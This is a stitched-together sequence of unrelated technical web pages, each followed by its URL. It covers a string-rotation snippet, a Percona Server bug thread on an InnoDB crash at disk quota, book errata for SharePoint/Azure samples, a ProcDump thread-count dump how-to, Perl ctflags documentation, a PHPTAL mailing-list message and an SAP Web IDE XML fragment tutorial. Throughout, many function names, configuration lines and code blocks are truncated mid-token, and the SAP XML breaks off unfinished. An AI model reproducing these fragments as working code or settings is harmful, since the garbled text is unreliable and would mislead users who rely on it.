If the match location (pos + i) goes beyond the end of the string rot, the match should continue from the beginning of rot, which is exactly what the (pos + i) % n accomplishes. This process does not use any extra space.
https://phoxis.org/2013/05/24/check-if-a-string-is-rotation-of-another/
Percona Server crashes with segmentation fault when disk quota is reached

Bug Description

Percona Server crashes with a segmentation fault when mysqld tries to write data to a table in a way that would mean extending the tablespace file, and disk quota is reached outside the database directory, but on the same volume.

=== OS:

  DISTRIB_ID=Ubuntu
  DISTRIB_
  DISTRIB_
  DISTRIB_
  2.6.32-341-ec2 #42-Ubuntu SMP Tue Dec 6 14:56:13 UTC 2011 x86_64 GNU/Linux

=== Percona Server version

  Server version: 5.5.24-55-log Percona Server (GPL), Release 26.0

-- Filesystem and mount options

  /dev/sdm /vol/ebs1 xfs rw,nodiratime,

=== Test case

-- create a new group and set quota of 10M for testing purposes

  groupadd free2
  xfs_quota -x -c 'limit -g bsoft=10m bhard=10m free2' /vol/ebs1

-- create the database, change the group to free2 and setgid the database directory so that all files created in the directory are owned by the group free2

  mysql [(none)]> create database free2test;
  chgrp -R free2 /vol/ebs1/
  chmod +s /vol/ebs1/

-- create the table as follows in the database free2test

  mysql [(none)]> use free2test;
  Database changed
  mysql [free2test]> CREATE TABLE `t1` (
    `i` int(11) not null auto_increment primary key,
    c char(255) default 'dummy_text'
  ) ENGINE=InnoDB DEFAULT CHARSET=utf8;
  Query OK, 0 rows affected (0.03 sec)

-- now create a 9M file outside of the database directory but in /vol/ebs1 where the quota is applied, and change its group to free2 (the one on which the quota is set)

  dd if=/dev/zero of=/vol/
  chgrp free2 /vol/ebs1/

-- now insert values into the table till MySQL crashes

  insert into t1(i) values (null);
  insert into t1 select null, c from t1; <-- 11th time this is executed and MySQL crashes

The gdb backtrace of the crash is attached. The section to look at is "Thread 1 (Thread 10457)"; the segmentation fault is caused inside the function btr_page_)

I believe it applies to upstream as well. In which case, it should also have an upstream bug report linked.
I am able to repeat the crash with the test case provided above on both Percona Server 5.5.24 and 5.5.28-29.1 on CentOS 5.8. The crash is also repeatable on upstream 5.5.28 and the stack trace is exactly the same. Attached you will find the complete backtrace generated from the core file.

Based on the trace, the call stack is probably like (in reverse order):

  fsp_try_
  fsp_reserve_
  fseg_alloc_
  btr_page_alloc_low
  btr_page_alloc
  btr_page_

(with no NULL checking in btr_page_alloc and btr_page_

  if (new_block) {
      buf_block_
  }

)

fsp_try_

Non-InnoDB code -- my_write in my_write.c handles this with a loop till space is available (with special handling for EDQUOT), whereas os_file_write_func doesn't do that and fails on ENOSPC/EDQUOT.

Ovais - Thanks. Could you also check 5.1 (since we will start fixing it there), and if debug builds crash differently?

Error log of MySQL 5.5.28 crash

Laurynas, I am not able to repeat the crash on MySQL 5.1.66. The exact steps, when done on 5.1.66, are handled gracefully, and when there is no space available the following is reported:

  mysql> insert into t1 select null, c from t1;
  ERROR 1114 (HY000): The table 't1' is full
  mysql> insert into t1 select null, c from t1;
  ERROR 1114 (HY000): The table 't1' is full

The error log entries are also different:

  Version: '5.1.66-community' socket: '/mnt/mysql/
  121117 3:06:58 InnoDB: Error: Write to file ./free2test/t1.ibd failed at offset 0 131072.
  InnoDB: 16384 bytes should have been written, only -1'.
  InnoDB: Some operating system error numbers are described at
  InnoDB: http://
  121117 3:06:58 [ERROR] /usr/sbin/mysqld: The table 't1' is full
  121117 3:07:13 [ERROR] /usr/sbin/mysqld: The table 't1' is full

Note that MySQL 5.5.28 reports "Operating system error number 0" while 5.1.66 reports "Operating system error number 122", which is more correct.

Ovais - Thanks. Can you test the 5.5 debug build too?

Laurynas, I am able to reproduce the crash on upstream 5.5.28 debug-build.
The debug-build crashes with an assertion failure instead of a segmentation fault. Attached is the gdb backtrace of the crashed 5.5.28 debug-build.

Attached is the error log of the crashed upstream 5.5.28 debug-build.

I tried this against 5.5.28-29.1 on CentOS 6, using xfs and the sequence described above, but with no crash. I properly got, on the 15th insert:

  mysql> insert into t1 select null, c from t1;
  ERROR 1114 (HY000): The table 't1' is full

Perhaps there is some minor difference in xfs between Ubuntu, CentOS 5 and CentOS 6? I will try with upstream 5.5.28...

OK, must be some difference in xfs; MySQL 5.5.28 behaves correctly as well (unless I am missing something in the reproduction). I will try to create a VM with Ubuntu and see if I can reproduce there...

1) The assertion failure in #12 and #13 is the effect and not the cause of the crash.

btr0btr.c:

  new_block = btr_page_
  new_page = buf_block_

btr_page_alloc returns NULL and buf_block_get_frame fails on that assertion. It falls for this assertion:

  ut_ad(block);

Interestingly, PS has non-debug assertions in place there:

  ut_a(srv_
  if (srv_pass_
      return(0);
  }
  ut_ad(block);

Now, the reason why that assertion is not getting triggered in MySQL/PS release builds (which instead crash with signal 11) is:

  =======
  #ifdef UNIV_DEBUG
  /******
  Gets a pointer to the memory frame of a block.
  @return pointer to the frame */
  UNIV_INLINE
  buf_frame_t*
  buf_block_
  /*=====
  const buf_block_t* block) /*!< in: pointer to the control block */
  __attribute_
  #else /* UNIV_DEBUG */
  # define buf_block_
  #endif /* UNIV_DEBUG */
  =======

i.e. in non-UNIV_DEBUG builds it is a macro, hence the backtrace shows only up to btr_page_

2) Regarding 'The table ... is full', fsp_reserve_

@Ovais, can you provide the cnf file you used for the MySQL/PS instances mentioned above?
(Also, was it a shared tablespace (spaceid=0) or a single tablespace?)

Here is the my.cnf file I used in the tests:

  [client]
  socket = /tmp/mysql.sock

  [mysqld]
  datadir = /mnt/mysql-55
  user = mysql
  socket = /tmp/mysql.sock
  innodb_
  core-file

  [mysqld_safe]
  core-file-size = unlimited

George, did you test with innodb_

Ovais, oddly enough, no I did not use file_per_table, which is quite odd as I almost always use it. Anyway, I retested on CentOS 6 with PS 5.5.28-29.1 debug builds (both with and without WITH_DEBUG=ON) and file_per_table, and also tried a few different things regarding which files are contained in the free2 group, and get either:

  "ERROR 1114 (HY000): The table 't1' is full"

from mysql if I "chgrp -R free2 /5gb/mysql/

  121120 9:26:02 [ERROR] /usr/local/
  121120 9:26:02 [ERROR] /usr/local/

from mysqld if I follow the test procedure exactly.

I failed miserably at getting a CentOS 5 VM running and building yesterday (wow, Stewart was correct, it really does, uhh, stink...), so I will try Ubuntu 10.04 lucid to save some time rather than fighting any more with CentOS 5, and see if I can reproduce.

My specifics:

mount:

  /dev/sdb on /5gb type xfs (rw,nodiratime,

my.cnf:

  [client]
  port = 3306
  socket = /tmp/mysql.sock

  [mysqld]
  port = 3306
  socket = /tmp/mysql.sock
  skip-external-
  key_buffer_size = 256M
  max_allowed_packet = 1M
  table_open_cache = 256
  sort_buffer_size = 1M
  read_buffer_size = 1M
  read_rnd_
  myisam_
  thread_cache_size = 8
  query_cache_size= 16M
  thread_concurrency = 8
  log-bin=mysql-bin
  binlog_format=mixed
  server-id = 1
  innodb_
  innodb_
  innodb_
  innodb_
  innodb_
  innodb_
  innodb_
  innodb_
  innodb_
  innodb_
  core-file

[root@localhost glorch]# ls -l /5gb/mysql/
total 149616
drwx------. 2 mysql free2       45 Nov 20 09:25 free2test
-rw-rw----. 1 mysql free2 18874368 Nov 20 09:35 ibdata1
-rw-rw----. 1 mysql free2 67108864 Nov 20 09:35 ib_logfile0
-rw-rw----. 1 mysql free2 67108864 Nov 20 09:23 ib_logfile1
-rw-rw----. 1 mysql free2        5 Nov 20 09:23 localhost.pid
drwx------.
2 mysql free2     4096 Nov 20 09:23 mysql
-rw-rw----. 1 mysql free2    27338 Nov 20 09:23 mysql-bin.000001
-rw-rw----. 1 mysql free2      126 Nov 20 09:23 mysql-bin.000002
-rw-rw----. 1 mysql free2    65536 Nov 20 09:35 mysql-bin.000003
-rw-rw----. 1 mysql free2       57 Nov 20 09:23 mysql-bin.index
drwx------. 2 mysql free2     4096 Nov 20 09:23 performance_schema
drwx------. 2 mysql free2        6 Nov 20 09:23 test

[root@localhost glorch]# ls -l /5gb/mysql/
total 9232
-rw-rw----. 1 mysql free2      65 Nov 20 09:24 db.opt
-rw-rw----. 1 mysql mysql    8578 Nov 20 09:25 t1.frm
-rw-rw----. 1 mysql mysql 9437184 Nov 20 09:35 t1.ibd

George, I only get the crash when I create a file outside of MySQL but within the same group on which the quota is applied. Perhaps you didn't actually run the steps in the sequence that I mentioned? I will try to run my test case on a CentOS 6 VM and let you know.

OK, I got it, Ovais; I was just replying when I got your response here. My directory structure was slightly different than yours. I got it under Ubuntu 10.04.4 lucid using your my.cnf and a closer approximation of your directory structure. On initial inspection, Raghavendra's analysis of the issue above is spot on. I will switch back to CentOS 6 (my preferred environment) and retry there, then continue on with the fix. Thanks for all the info.

Annnd, I got it in CentOS 6 now too. Thanks a bunch guys... possible fix forthcoming.

Now that we have verified it, we need to see what the behaviour should be in this case: whether to return DB_OUT_

Also, error handling is required in btr_cur_

  ......
  } else {
      *rec = btr_page_
  }
  ......
(big_rec needs to be set NULL as well as DB_OUT_

Raghu, related to what you are saying that InnoDB should spin and wait for space to be available, there is something similar in upstream 5.7.0 where MySQL retries the operation several times before giving up; see this bug report: http://

OK, so this is rather nasty, in PS 5.5.28:

  btr0cur.
  fsp0fsp.

So then btr0cur.

It then calls:

  btr0btr.

OK, so let's fix the math error in fsp_reserve_

  n_free_up = (size - free_limit) / FSP_EXTENT_SIZE;

to:

  if (size <= free_limit) {
      n_free_up = 0;
  } else if (alloc_type == FSP_UNDO) {
      n_free_up = (size - free_limit) / FSP_EXTENT_SIZE;
  }

OK, so this solves the issue for _small_ inserts, like if the test above just did something like:

  for i in `seq 2000`; do mysql -e 'INSERT INTO free2test.t1(i) VALUES (null)'; done;

But if we follow the sequence prescribed above by doing:

  mysql -e 'INSERT INTO free2test.t1 SELECT null FROM free2test.t1'

then we have a big problem: there is no space left to perform the rollback. If we set a simple breakpoint at the end of fsp_reserve_

  b fsp0fsp.c:3088 if space > 0 && (!success || !n_pages_added)

This will stop us every time we 'detect' the error...

Here is the call stack where we first detect the space issue:

  #0 fsp_reserve_
  #1 0x0000000000879ecc in btr_cur_
     at /home/glorch/
  #2 0x0000000000960e12 in row_ins_
  #3 0x0000000000962681 in row_ins_index_entry (index=
  #4 0x00000000009631c5 in row_ins_index_e...

George, I repeated the test case with innodb_

  121127 5:38:57 InnoDB: Error: Write to file ./ibdata1 failed at offset 0 20971520.
  InnoDB: 1048576 bytes should have been written, only 196608 were written.
  InnoDB: Operating system error number 0.
  InnoDB: Check that your OS and file system support files of this size.
  InnoDB: Check also that the disk is not full or a disk quota exceeded.
  InnoDB: Error number 0 means 'Success'.
  InnoDB: Some operating system error numbers are described at
  InnoDB: http://

You can see that the error log entry makes reference to a partial write and that the error number was 0, which is exactly what is written to the error log when InnoDB crashed. However, repeatedly executing the insert ... select only results in the following message:

  121127 5:38:57 [ERROR] /usr/sbin/mysqld: The table 't1' is full
  121127 5:39:04 [ERROR] /usr/sbin/mysqld: The table 't1' is full
  121127 5:39:06 [ERROR] /usr/sbin/mysqld: The table 't1' is full

Could this be taken as a workaround, "using a single shared tablespace with innodb_

Ovais, innodb_

I can make the server crash or fail gracefully by simply varying the number of rows inserted at one time, which varies both the space required to perform the inserts _and_ the space required to perform a rollback. By inserting a single row at a time, there is almost always going to be enough space left to perform a rollback when enough extents can't be reserved for the insert. By increasing the number of rows inserted at once until the row size requirement is just less than the available free space, the rollback crash will occur, since then the attempt to reserve any extents to perform the rollback will fail, sending the server into a massive anxiety attack and shutting down. So changing where the space is allocated is really just pushing peas around the plate.

See http://

The money quote:

"[17 Mar 2009 9:39] Marko Mäkelä

Fixing this bug would be a major undertaking, and it might affect the performance of InnoDB as well. InnoDB assumes in many places that space is available for the undo log records. We could add a check (and a rollback) to each place where something is written to the undo log, but that would likely move the problem elsewhere, since B-tree delete operations sometimes require extra space.
We could also shut down InnoDB in the event of such a failure, but that would require extra checking (possibly even locking) in the MySQL-to-InnoDB interface. The bottom line is that the root cause (the InnoDB system tablespace being too small) cannot be fixed without a server restart. Currently, InnoDB can't be shut down and restarted independently of MySQL. The fix is too risky to be implemented in the stable releases of MySQL."

George, based on Marko's comments in this bug report http://

If there really would be any performance regression, I think many users would be more concerned by that rather than the fixes in tablespace management :)

I don't think "Fix Released" is a correct status for this bug. The server still crashes on full disk errors. What has been fixed is bug 1083700 (a bug in the reserved extent number calculation), and this one should be "Won't Fix" instead.

Percona now uses JIRA for bug reports, so this bug report is migrated to: https:/

Is this reproducible with:
- Current 5.5 release?
- Current 5.1 release?
- Is this bug Percona Server-specific or is it reproducible with MySQL too?

Also, it would be useful to try reproducing this using a debug build.
https://bugs.launchpad.net/percona-server/+bug/1079596
The following lines appear in this sample:

  string myAccountKey = "myliveID@hotmail.com";
  string myUniqueUserId = "your key here";
  ....
  azureWebRequest.Credentials = new NetworkCredential(myAccountKey, myUniqueUserId);

Obviously, the two variable names are reversed. The code works only because the author made the same reversal in the last line that he made in the first two lines. But that doesn't change the fact that this code is very misleading. The FIRST parameter to the NetworkCredential ctor must be a user name and the SECOND must be the DataMarket account key.

Note from the Author or Editor: This is correct. Make sure the first variable is the user name and the second is the key.

The following phrase should be deleted from step 7: "After the project has been created". That phrase makes no sense here. The project is not only created, we've already added a service reference to it in an earlier step.

Note from the Author or Editor: Typo: "project" was meant to be "service reference" here.

This code was apparently copied from p. 36, but the namespace and class names are not correct here on p. 43. The namespace is DallasCrimeDataWebPart and the class is ReturnCrimeData.

Note from the Author or Editor: If you walk through the steps, then you will have a namespace of DallasCrimeDataWebPart (assuming you don't add your class as a separate resource in a separate namespace) and the class will read ReturnCrimeData. The important point is that the class members/properties are the same.

Both of these pages have the line:

  using Dallas_Silverlight_Crime_App.DallasCrimeDataSvc;

But in fact in step 6 on p. 42, we were instructed to use the name DallasCrimeDataService. So the two using statements should be:

  using Dallas_Silverlight_Crime_App.DallasCrimeDataService;

This procedure has us add the service reference twice: once in steps 5-7 and then again, with a different name, in steps 9-11. This is redundant. Steps 9-11 should be deleted.
Note from the Author or Editor: This is indeed a duplicate step. You only need to add the local service reference once.

With SDK 1.4, a reference to Microsoft.WindowsAzure.StorageClient.DLL is already part of the project when it is created, so it cannot be added here. You also have to add a using statement for Microsoft.WindowsAzure.ServiceRuntime.

The following line in the RowCommandHandler definition is unneeded:

  var blobContainer = azureBlobClient.GetContainerReference("imagefiles");

There is already a global blob container reference that was initialized in the Page_Load method. Delete the line above and change the variable name in the line that follows it to azureBlobContainer, like this:

  var blob = azureBlobContainer.GetBlobReference(blobName.ToString());

"... the GetCurrentDateTime method (a helper method that returns the current date and time as a DateTime object) ..." Actually, it returns the current date and time as a STRING object. In fact, converting the DateTime to a string is the only purpose it serves.

"videofiles" near the end of the line should be "imagefiles".

"WCF Web Application" should be "WCF Service Application".

"the WCF solution" should be "the WCF project within your solution". You do NOT want to right-click the whole solution.

There is a missing step between steps 4 and 5. You have to open the *.svc file in Visual Studio and change "Service1" to "GetAzrueDataStorage". Otherwise, IIS throws an exception that it can't find a type named "Service1".

This step is way too rushed and leaves out much. I recommend replacing it with the following:

9.a. After the IIS web site is created, double-click Application Pools in the IIS Manager navigation tree to open the list of application pools.

9.b. Look at the entry for the pool that has the same name as the IIS web site you just created. The .NET Framework column should say "v4.0" for this row. If it does not, right-click the row and select Basic Settings.
In the dialog that opens, change the .NET Framework to 4.0 and click OK.

9.c. Highlight the new IIS web site in the Sites node of IIS Manager and click the Content View tab near the bottom of the screen.

9.d. Right-click the *.svc file and select Browse. If all is well, your browser will open to a page telling you that you need to create a client. You will NOT get the actual data from the service at this time.

Note from the Author or Editor: While we're only testing whether the service resolves and loads, this is fine detail to add.

Before you close the Add Web Site dialog, you need to click Test Settings to verify that your service user is both authenticated and authorized to read the folder to which you published the service. ON A TYPICAL SHAREPOINT DEVELOPMENT MACHINE, IT WILL NOT BE AUTHORIZED. If it is not, either give the user the needed sharing permissions to the folder or use the Connect As button on the Add Web Site dialog to change the service user to one who already has the needed permissions.

Note from the Author or Editor: Yes, this is correct. Also, note that much of this book was written in an admin context on a single-server farm and should be treated as demo code. This book warrants an entirely separate FAQ on best practices for production deployments.

Some text that is not bolded also needs to be added; for example, the "sdk" namespace declaration and the DesignerWidth. You really should replace all of the contents of MainPage.xaml with the whole of the code sample in this step.

Replace "to the file" with "to the project".

There's a step missing here. Between steps 13 and 14, you need to add a reference in the project to the System.Xml.Linq assembly.

ANOTHER MISSING STEP BETWEEN STEPS 13 AND 14! You have to right-click the References node in the project and add a Service Reference. Click Discover in the dialog and it will find the service you created earlier in the exercise. Click Go. Then replace the default namespace name with "AzureImageWCFService". Click OK.

A THIRD MISSING STEP between steps 13 and 14. You have to right-click the References node in the Silverlight project and add a reference to the System.Windows.Controls.Data assembly. If you don't, some generated code that references the DataGrid control will produce a compile-time error.
Click OK. A THIRD MISSING STEP between steps 13 and 14. You have to right-click the References node in the Silverlight project and add a reference to the System.Windows.Controls.Data assembly. If you don't some generated code that references the DataGrid control will produce a compile time error. Note from the Author or Editor:On page 138, in step 12 the instructions discuss adding code that provides a datagrid on the app. You can also drag and drop a Datagrid control to the Silverlight canvas, which will automatically add the correct assembly references to the project. There's a missing step here after step 14. You need to add the two cross domain policy XML files from the top of p. 51 to the folder where you published the WCF service. E.g., C:\AzureBlobService the line using Microsoft.SharePoint.Client; should be: using ClientOM = Microsoft.SharePoint.Client; Note from the Author or Editor:On page 147, the code that leverages the clientside object model is prefaced with the "ClientOM" namespace. As per the errata suggestion, you can amend the using statement to "using ClientOM = Microsoft.SharePoint.Client" else leave "using Microsoft.SharePoint.Client" and remove the "ClientOM" namespace prefix in the code. An additional required step is left out. You need to edit the Web Part to change its Height to 600px and its width to 1000px. Note from the Author or Editor:On page 150, after step 16, you can edit the web part and in the Appearances section of the Web Part Options you can select a Height and Width for the web part. As per the note, you can select 600px for height and 1000px for width--or whatever height and width are amenable to your needs. There is a whole set of missing steps here connected with creating a list. You have to create a list named "Azure Images" and give it a Link column (SharePoint column type hyperlink), a Coolness column (type Choice), and a Notes column (type multiple lines of test). To get your list to match the screen shot on p. 
151, you also have to rename the Title column to "Name". Note from the Author or Editor:On page 150, step 9 assumes you've created a list called Azure Images. It should read: 9. Open your SharePoint site, and if you haven't already create a new list called "Azure Images" and add three columns. Call the first column you add (of type Hyperlink) "Link." Call the second column you add (of type Choice) Coolness. Call the third column you add (of type Multiple lines of text) Notes. Then rename the Title column to "Name." The downloaded source files for chapter 6 are missing the WCF service folder and its files. The *.sln file is looking for WCFServiceWebRole1\AzureMortgageService.csproj and there isn't such a folder or file. Note from the Author or Editor:I've added the missing service code here:. It is contained in the "Missing_Service_Code.zip" zipped archive. "AzureService.cs" should be "AzureService.svc.cs" Note from the Author or Editor:When you create a new service, the default name is typically "Service1.svc" for example. When you double-click to view the service class code, you should see "Service1.svc.cs" as the class code. So, this errata is correct; there was an editing error that was not caught. If you follow the steps, in your project you should have "AzureService.svc.cs" as the core service class code. © 2014, O’Reilly Media, Inc. (707) 827-7019 (800) 889-8969 All trademarks and registered trademarks appearing on oreilly.com are the property of their respective owners.
http://www.oreilly.com/catalog/errata.csp?isbn=0790145316462
So, you have an application that uses a lot of threads and you would like to know how to trigger a dump when the number of threads exceeds a particular limit. Well, look no further, this is how you can do it. Let's do it by example.

Start Visual Studio and create a new web site. Add a button to the default.aspx page and set the code behind for the page to this:

using System;
using System.Collections.Generic;
using System.Threading;

public partial class _Default : System.Web.UI.Page
{
    protected void Page_Load(object sender, EventArgs e) { }

    protected void Button1_Click(object sender, EventArgs e)
    {
        List<Person> persons = new List<Person>();
        int noOfPersons = 25;
        int sleepTime = 20000;

        for (int i = 0; i < noOfPersons; i++)
        {
            persons.Add(new Person());
        }

        foreach (Person p in persons)
            p.StartUpdate(sleepTime);
    }

    class Person
    {
        public Thread UpdateThread;

        public Person()
        {
            UpdateThread = new Thread(Person.FakeUpdateToRemoteResource);
        }

        public void StartUpdate(int sleepTime)
        {
            UpdateThread.Start(sleepTime);
        }

        public static void FakeUpdateToRemoteResource(object sleepTime)
        {
            Thread.Sleep(Convert.ToInt32(sleepTime));
        }
    }
}

This is naturally not how you should code anything. It is just here to emulate an application that updates a list of persons, each update on a separate thread, since working with the remote resource may be slow.

So, build the above and navigate to the Default.aspx page. Start Performance Monitor and add the counter 'Thread Count' for the w3wp process under the Process section. Then hit the button and you should see something like below: 25 threads running for 20 seconds.

So now we know that we see the behavior. So, how to dump on this? It can be done from DebugDiag (it will use the same mechanics as below), but if you do not want to install anything then you can do it like this:

. Create a directory called C:\ProcDump.
. Download ProcDump from here:
. Unzip the ProcDump.zip in the C:\ProcDump directory.
. Start a Command Prompt as Administrator ("Run as administrator") and navigate to the C:\ProcDump\ directory.
. Find out what the PID is for the w3wp.exe process that we want to dump, for example with Task Manager and the PID column.
. Run the following from the command prompt. !!! Replace both occurrences of 1234 with the PID for your w3wp.exe !!!

  procdump -accepteula -p "\Process(w3wp_1234)\Thread Count" 50 -s 10 -ma 1234

. This will generate a full (-ma) dump when the # of threads for PID 1234 is greater than 50 for more than 10 seconds.

-> You can change 50 in order to dump on a higher or lower number of threads.
-> You can change 10 (the -s switch) in order to dump on a higher or lower threshold that must be hit before the dump is written.
-> The dump will end up in the C:\ProcDump\ directory.

Once ProcDump is running, hit the button again and you should get an output like below and the dump file created in the C:\ProcDump directory.

Hope this helps.
http://blogs.msdn.com/b/spike/archive/2012/02/27/how-to-create-a-dump-on-x-number-of-threads-in-a-process.aspx?Redirected=true
NAME

ctflags - Perl extension for compile time flags configuration

SYNOPSIS

  use ctflags qw(foo=myapp:f76 debug=myapp:debug:aShu);

  if (foo > 45) { ... }
  debug and warn "hey!, debugging...";

  use ctflags package=>'foo', prefix=>'bar',
              'myapp:danKE', 'mycnt=yours:Y6';

  print "foo::bar_d=".foo::bar_d."\n";
  print "foo::bar_K=".foo::bar_K."\n";
  print "foo::mycnt=".foo::mycnt."\n";

DESCRIPTION

The ctflags module (and ctflags::parse) makes it easy to define flags as Perl constants whose values are specified from command line options or environment variables.

The ctflags and ctflags::parse packages allow constant values to be set dynamically at compile time (every time the perl script is run) based on environment variables or command line options.

Conceptually, ctflags are unsigned integer variables named with a single letter ('a'..'z', 'A'..'Z', case matters), and structured in namespaces. Several ctflags with the same name can coexist as long as they live in different namespaces (just as Perl variables with the same name but living in different packages are different variables).

Namespace names have to be valid Perl identifiers composed of letters, the underscore char (_) and numbers. The colon (:) can also be used to simulate nested namespaces. Examples of valid qualified ctflags names are...

  myapp:a        # ctflag a in namespace myapp
  myapp:A        # ctflag A in namespace myapp
  myapp:debug:c  # ctflag c in namespace myapp:debug
  otherapp:C     # ctflag C in namespace otherapp
  App3:A         # ctflag A in namespace App3

A property of ctflags is that they do not need to be predefined to be used, and their default value is 0.

Package ctflags offers a set of utilities to convert ctflags to Perl constants. Basic functionality to set and retrieve ctflag values is also offered, but the ctflags::parse package should be preferred for this task.

Sets the value of ctflag $name in namespace $ns to be $value.
This function will be useless unless you are able to call it before the ctflags are converted to constants, and this means early at compile time, and this means that you will have to use BEGIN {...} blocks. i.e.:

  # at the beginning of your script;
  use ctflags;
  BEGIN {
    use Getopt::Std;
    our ($opt_v);
    getopts ("v:");
    ctflags::set('myapp', 'v', $opt_v);
  }
  use Any::Module ...

  # in Any::Module
  package Any::Module;
  use ctflags 'verbose=myapp:v';

Retrieves the value of ctflag $name in namespace $ns.

Creates Perl constants from ctflag values. @options can be a combination of key => value option pairs and ctflags-to-constants conversion specifications. Currently supported options are:

prefix

When no name is explicitly set for the constant to be created, one is automatically generated as $prefix.$ctflag_name. The default prefix is ctflag_ and this option lets you change it. i.e.:

  use ctflags prefix=>'debug_', 'myapp:debug:abc';

exports ctflags a, b and c in namespace myapp:debug as constants debug_a, debug_b and debug_c.

package

Exports the constants to package $package instead of to the current one. i.e.:

  use ctflags package=>'foo', 'flag=myapp:f',
              package=>'bar', 'flag=myapp:b';

exports ctflag f in namespace myapp as Perl constant foo::flag and ctflag b in namespace myapp as Perl constant bar::flag.

ctflags-to-constants conversions are specified as:

  [cnt_name=]namespace:(*|ctflag_names)

This expands to a small set of rules:

  foo:*      export all ctflags in namespace foo as constants ctflag_a,
             ctflag_b, ..., ctflag_Z (unless the prefix option has been used
             to change the generated constant names to, say, myprefix_a,
             myprefix_b, etc.)

  foo:bar    export ctflags b, a and r in namespace foo as ctflag_b,
             ctflag_a and ctflag_r.

  cnt=foo:b  export ctflag b in namespace foo as constant cnt.

When the constant name appears explicitly and more than one ctflag is specified in any way, the value of the constant is the result of combining all the ctflag values with the arithmetic or operator (|). i.e.:

  use ctflags qw(anydebug=myapp:debug:*);
  ...
if (anydebug) { open DEBUG, ">/tmp/output" } Default values can be specified to be used when no value has been previosly assigned explicitly to a ctflag. They should be composed of digits and appear in the conversion specification just after the ctflag name letter to be affected. i.e.: use ctflags qw(foo:bar67) ctflag_r will return 67 unless foo:r had been previouly defined in any way. The specification of the default value do not assign it to the ctflag. i.e: use ctflags qw(cnt1=foo:r67) use ctflags qw(cnt2=foo:r) if ctflag foo:r was not previusly set, cnt1 will return 67 and cnt2 will return 0. Uff... well, it depends, see the import function in the previous section. This is version 0.01, and I am sure that several bugs are going to appear. Also I reserve the rigth to change the public interface of the module in an incompatible manner if deficiencies in the current one are found (this will not be this way forever, just for some time). I will really apreciate any correction to the documentation prose, English is not my native tongue and so... Companion package ctflags::parse, constant package and perlsub for a discusion about how perl constants can be implemented as inlined subrutines. Salvador Fandiño Garcia, <sfandino@yahoo.com> (please, revert to "Salvador Fandino Garcia" if your display charset is not latin-1 compatible :-( This library is free software; you can redistribute it and/or modify it under the same terms as Perl itself.
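The flag semantics described above (single-letter flags living in namespaces, an implicit value of 0, per-lookup defaults, and or-combining several flags into one constant) can be sketched in Python. This is an illustrative analogue only; the function names below are made up and are not part of ctflags:

```python
from collections import defaultdict

# Registry of flags: namespace -> {letter: value}; unset flags read as 0.
_flags = defaultdict(dict)

def set_flag(ns, name, value):
    _flags[ns][name] = value

def get_flag(ns, name, default=0):
    # A default supplied at lookup time is used only if the flag was never
    # set, mirroring defaults in ctflags conversion specifications.
    return _flags[ns].get(name, default)

def make_constant(ns, names, defaults=None):
    # Combine several flags of one namespace with bitwise or, as ctflags
    # does when one constant name covers more than one flag.
    defaults = defaults or {}
    value = 0
    for n in names:
        value |= get_flag(ns, n, defaults.get(n, 0))
    return value

set_flag("myapp", "f", 76)
print(get_flag("myapp", "f"))            # 76
print(get_flag("foo", "r", default=67))  # 67: default used, flag never set
print(make_constant("myapp", "ab"))      # 0: both flags unset
```

Unlike real ctflags, nothing here happens at compile time; the sketch only mimics the namespace, default, and or-combining rules.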
http://search.cpan.org/~salva/ctflags-0.04/ctflags.pm
On 12/01/2009 12:46 PM, Kornel Lesiński wrote:

> PHPTAL has been accepted as official PEAR package!

Good work!

> The good things:
>
> * It's been reviewed by PEAR team and they'll be keeping eye on package's quality.
> * It's got access to pear.php.net facilities, like bug tracker, roadmaps, releases archive, official installer, etc. I haven't prepared PEAR releases yet, but you can start using bug tracker now:
> * It will be hosted in php.net SVN repository.
>
> The bad news is that PEAR requires renaming of package from just "PHPTAL" to "HTML_Template_PHPTAL", which means change of all class names! Since I'm not too keen on having 3 times longer class name prefix, I've decided to use PHP 5.3 namespaces (PEAR2 package) for official PEAR releases. In PHP 5.3 you can hide those long prefixes by aliasing namespaces.

might then be of interest :)

regards,
Tarjei

> Of course I realize 5.3 isn't available to everyone yet, so I'm going to keep current backwards-compatible distribution maintained in parallel until PHP 5.3 becomes commonplace.
>
> Questions? Suggestions?

--
Tarjei Huse
Mobil: 920 63 413

_______________________________________________
PHPTAL mailing list
PHPTAL@lists.motion-twin.com
https://www.mail-archive.com/phptal@lists.motion-twin.com/msg01177.html
Create an XML view fragment file to control the display of information on the tab in your app

By Jim Jaquet

With your app committed to your Git repository, you can now safely make some changes to the app. Any mistakes you make can be removed by discarding your changes using the Git pane. In this tutorial, you will add some additional data fields to the detail view (the right side of your app), change the icons used on the tabs, and finally add an XML fragment file to contain the display of information on one of the tabs in the app.

Open the SAP Web IDE, and navigate to the te2016 > webapp > view folder. Double-click on Detail.view.xml to open it in the editor.

Insert the code below into the ObjectHeader element. This XML snippet adds four fields from the OData service (City, Country, URL and Partner role), as well as a reference to a title that you will insert in the next step.

Note that the code generated by the template has a closing angle bracket on line 19. That angle bracket belongs with the line above. Insert the code below as shown and you can clean up the angle bracket as well. Save your changes.

Code to insert:

```xml
<ObjectAttribute title="{i18n>headerCity}" text="{Address/City}"/>
<ObjectAttribute title="{i18n>headerCountry}" text="{Address/CountryText}"/>
<ObjectAttribute title="{i18n>headerURL}" text="{WebAddress}"/>
<ObjectAttribute title="{i18n>headerBusinessPartnerRole}" text="{BusinessPartnerRoleText}"/>
```

Your XML file should look like this:

The title attributes in the snippet you inserted tell the app to look for the label of the data field in a centralized file. To add those labels, open the te2016 > webapp > i18n folder and double-click the i18n.properties file. Insert the text below at the end of the i18n.properties file, just below the Detail View separator line, and save your edits.
```
headerCity=City
headerCountry=Country
headerURL=URL
headerBusinessPartnerRole=Relationship
itf1Title=Contacts
itf2Title=Map
mapFragmentTitle=Map
```

The actual location in the file doesn't matter, but it is nice to keep things organized so you can find them easily in the future. You will notice three additional labels that you've added; you will use them later in the tutorial.

With both files saved, click the Run button again to launch your app. You should now see the four additional fields at the top of the detail view.

Before you make some additional changes to the Detail.view.xml file, you will create an XML fragment file that you will link to the detail view. A fragment is a light-weight UI component that does not have a dedicated controller. Fragments are typically used in pop-up screens (dialogs, message boxes, etc.), and you will use one to control the data shown on the second tab of your app.

Add a new file to your project by right-clicking on your view folder and selecting New > File. Name the file Map.fragment.xml (the case is important) and click OK.

Paste the XML below into the new Map.fragment.xml file and save your edits.

```xml
<core:FragmentDefinition xmlns:
  <l:Grid
    <l:content>
      <f:SimpleForm
        <f:content>
          <Label text="Address "/>
          <Text text="{Address/Building}"/>
